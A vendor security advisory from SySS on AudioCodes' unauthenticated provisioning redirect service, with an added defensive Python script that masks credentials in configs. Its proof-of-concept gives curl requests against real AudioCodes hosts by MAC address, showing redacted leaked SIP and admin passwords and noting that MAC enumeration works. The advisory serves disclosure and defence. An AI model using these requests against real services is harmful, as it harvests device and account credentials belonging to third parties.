-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-053
Product:                   AudioCodes Provisioning Service
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       N.A.
Tested Version(s):         N.A.
Vulnerability Type:        Exposure of Sensitive Information to an
                           Unauthorized Actor (CWE-200)
Risk Level:                High
Solution Status:           Fixed; manual actions are required
Manufacturer Notification: 2022-11-11
Solution Date:             2023-07-12
Public Disclosure:         2023-08-10
CVE Reference:             Not yet assigned
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The AudioCodes Provisioning Service is a web service hosted by AudioCodes.
Its main purpose is the automatic provisioning ("zero touch deployment")
of AudioCodes devices, e.g. VoIP phones.

The manufacturer describes the product as follows (see [1]):

"AudioCodes Redirect Service offers an efficient and reliable method for
service providers, distributors, resellers and end customers to enable
mass auto-provisioning of AudioCodes devices. It achieves this by
redirecting generic devices to a dedicated provisioning server when they
are first booted up, eliminating the need to pre-configure devices before
deployment."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When an AudioCodes device starts with default factory settings, it
requests a configuration file or a new provisioning URL from the
AudioCodes Provisioning Service (reachable at the URL
https://redirect.audiocodes.com), identifying itself by its MAC address.

Due to the lack of authentication, an attacker is able to request these
configurations and extract sensitive information such as device, SIP,
and LDAP credentials.

Since the configurations are assigned based on the requested MAC address,
it is also possible to enumerate all AudioCodes MAC addresses and thus all
existing configurations and provisioning redirections.
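As an added example (not part of the advisory and not AudioCodes' own code), the following Python script parses a device configuration in the key=value style shown in the PoC below and reports which keys carry credentials (with masked values, and whether the value is in the {"..."} encrypted form seen in the OVOC example) and which keys point to a plain http:// provisioning URL, so an administrator can assess what a leaked configuration would expose. The sample configuration, the credential key markers and all placeholder values are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the key=value style of the AudioCodes device
# configurations quoted in the advisory; every value is a placeholder.
SAMPLE_CONFIG = """\
; constructed example, not a real device configuration
voip/line/0/auth_name=u36XXXXXXXXXXXX
voip/line/0/auth_password=5h!XXXXXXXXXXXX
system/password=57XXXXXXXXXXXX
system/web_user_password=57XXXXXXXXXXXX
ems_server/user_name=ovocuser@example.invalid
ems_server/user_password={"yo7pj3XXXXXXXXXXXX"}
;NO USER ovocuser@example.invalid configuration
provisioning/url=http://redirect.example.invalid/pub/phone.conf
"""

# Heuristic key fragments that mark a credential (my own list, not an
# AudioCodes-defined one). Encrypted OVOC values appear as {"..."}.
SECRET_KEY_MARKERS = ("password", "auth_name")
ENCRYPTED_VALUE = re.compile(r'^\{".*"\}$')


def parse_config(text: str) -> Dict[str, str]:
    """Parse key=value lines; ';' starts a comment, blank lines are skipped."""
    config: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        config[key.strip()] = value.strip()
    return config


def mask(value: str) -> str:
    """Keep two leading characters so a finding can be matched to the file."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def find_credentials(config: Dict[str, str]) -> List[Tuple[str, str, bool]]:
    """(key, masked value, is_encrypted) for every credential-bearing key."""
    return [
        (key, mask(value), bool(ENCRYPTED_VALUE.match(value)))
        for key, value in config.items()
        if any(marker in key.lower() for marker in SECRET_KEY_MARKERS)
    ]


def find_cleartext_urls(config: Dict[str, str]) -> List[str]:
    """Keys whose value is a plain http:// URL, as in the advisory's Example 1."""
    return [k for k, v in config.items() if v.lower().startswith("http://")]
```

Run `find_credentials(parse_config(open(path).read()))` against a configuration downloaded from your own provisioning server to see which credentials it would hand to anyone who can fetch it.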
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Example 1: Requesting and accessing a device-specific configuration file

1. #> curl -v https://redirect.audiocodes.com/00908FC50000

2. The AudioCodes Provisioning Service responds with a redirect, i.e. with
   an HTTP Location header:

   HTTP/1.1 302 Found
   Location: http://redirect.audiocodes.com/pub/MP202-DMS-Flash-USA.CONF

3. By following the redirection, the device configuration is accessible:

   #> curl -L https://redirect.audiocodes.com/00908FC50000
   [...]
   (password(############))
   [...]

Example 2: Requesting and accessing a device-specific configuration file
with a redirect to the AudioCodes "One Voice Operation Center"

1. #> curl -v https://redirect.audiocodes.com/00908F9D896A

2. The redirection indicates the use of the AudioCodes "One Voice
   Operation Center":

   HTTP/1.1 302 Found
   Location: https://ippdm.audiocodes.com/ipp/;dhcpoption160.cfg

3. Requesting and accessing the device configuration from the "One Voice
   Operation Center":

   #> curl https://ippdm.audiocodes.com/configfiles/00908F9D896A.cfg
   [...]
   ems_server/user_name=############@audiocodes.com
   ems_server/user_password={"yo7pj3############"}
   ;NO USER ############@audiocodes.com configuration
   [...]

4. The password value in this example is encrypted. However, due to the
   use of a hardcoded cryptographic key (CWE-321), this encrypted password
   can be decrypted. See SYSS-2022-052 for more information about this
   security issue.

Example 3: Requesting and accessing a device-specific configuration file
with a redirect to another service provider

1. #> curl -v https://redirect.audiocodes.com/00908F9DB311

2. Redirect to a service provider, including a 32-byte UID:

   HTTP/1.1 302 Found
   Location: https://phones-na.#####.##/1f417#######[...]/

3. Requesting and accessing the device configuration:

   #> curl -v https://phones-na.#####.##/1f417#######[...]/00908F9DB311.cfg
   [...]
   voip/line/0/auth_name=u36############
   voip/line/0/auth_password=5h!############
   system/password=57############
   system/web_user_password=57############
   [...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Customers have to manually enable mTLS in the Redirect Service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-11-03: Vulnerability discovered
2022-11-11: Vulnerability reported to manufacturer
2022-12-12: Vulnerability confirmed by AudioCodes Ltd.
2023-01-10: AudioCodes Ltd. informs that certificate-based authentication
            is planned and will be implemented
2023-03-29: AudioCodes Ltd. delays the planned certificate-based
            authentication due to backward compatibility issues
2023-07-12: AudioCodes Ltd. releases certificate-based authentication,
            which must be manually enabled by customers
2023-07-12: A product notice about the solution is provided by
            AudioCodes Ltd. [5]
2023-07-13: It is recommended to enable and enforce mTLS by default
2023-07-14: AudioCodes Ltd. informs that this will be discussed internally
2023-08-10: Public disclosure at Black Hat USA [6]
2023-08-11: Public disclosure at https://blog.syss.com [7]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes Redirect Service Datasheet
    https://www.audiocodes.com/media/15664/audiocodes-redirect-service.pdf
[2] AudioCodes One Voice Operation Center User's Manual
    https://www.audiocodes.com/media/15928/one-voice-operations-center-users-manual-ver-80.pdf
[3] SySS Security Advisory SYSS-2022-053
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-053.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] AudioCodes Ltd. mTLS Product Notice
    https://www.audiocodes.com/media/cuzmopqx/0503-product-notice-mutual-tls-authentication-for-audiocodes-redirect-service.pdf
[6] Black Hat USA Briefings Session
    https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341
[7] Detailed Blog Post
    https://blog.syss.com/posts/zero-touch-pwn/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en